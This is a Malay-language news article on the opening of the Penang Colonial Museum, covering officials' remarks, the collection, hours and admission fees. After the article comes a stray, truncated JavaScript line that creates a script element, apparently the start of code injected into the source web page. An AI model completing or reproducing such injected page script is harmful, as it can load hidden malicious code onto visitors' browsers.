Muzium Kolonial P. Pinang dibuka

Oleh: AINUL WARDAH SOHILLI
Gambar: MARK JAMES

GEORGE TOWN – Pulau Pinang kini mempunyai sebuah lagi lokasi tarikan pelancongan baharu iaitu Muzium Kolonial Pulau Pinang. Terletak di No. 7, Jalan D. S. Ramanathan (dahulunya dikenali sebagai Jalan Scott), muzium pertama seumpamanya dalam kategori warisan berkenaan dirasmikan Ketua Menteri, Y.A.B. Tuan Lim Guan Eng di sini baru-baru ini.

Dalam ucapan perasmian, Guan Eng percaya bahawa lokasi muzium dan suasana era kolonial yang diterapkan mampu mengembalikan nostalgia sewaktu pemerintahan British di Pulau Pinang.

“Muzium ini akan menjadi medan pendidikan khususnya kepada pelajar dan pengkaji sejarah era kolonial selain menjadi warisan kekayaan negara yang penting,” kata beliau yang turut meluangkan masa selama satu jam di muzium berkaitan.

Dalam pada itu, Pengarah Urusan Muzium Kolonial Pulau Pinang, Eric Ma berkata, dengan bantuan Kementerian Pelancongan dan Kebudayaan serta Kerajaan Negeri Pulau Pinang, keluarganya dapat berkongsi koleksi peribadi yang disimpan sejak tiga generasi lalu.

“Terdapat lebih 1,000 artifak dan koleksi era kolonial milik keluarga kami dan kami amat berbesar hati dapat berkongsi sejarah setiap koleksi dengan para pengunjung,” katanya ketika ditemui pada majlis perasmian muzium tersebut baru-baru ini.

Antara koleksi yang terdapat di muzium ini termasuklah dokumen tulisan tangan milik pengasas Pulau Pinang iaitu Kapten Sir Francis Light bertarikh 28 Julai 1794, lukisan terbalik (reverse painting) oleh William Morris & Company (Westminster) Ltd., lukisan kaca berwarna (stained glass) hasil karya Hubert McGoldrick, Alfred Ernest Child dan Katherine O’Brien, patung marmar carrara putih hasil Atelier R. Bigazzi Florence dan lain-lain.

Selain ruang pameran, pengunjung boleh meluangkan masa menjamu mata di kedai cenderamata ataupun menikmati hidangan ala kolonial di kafe muzium.

Dibuka setiap hari dari 9.30 pagi hingga 6.30 petang. Bayaran masuk adalah RM20 (dewasa dan pemegang MyKad), RM12 (kanak-kanak dan pemegang MyKid), RM30 (dewasa dan bukan pemegang MyKad) dan RM15 (kanak-kanak dan bukan pemegang MyKid).

Maklumat lanjut boleh layari sesawang, www.colonialpenang museum.com atau laman Facebook di Colonial Penang Museum.

 var d=document;var s=d.createElement(‘script’);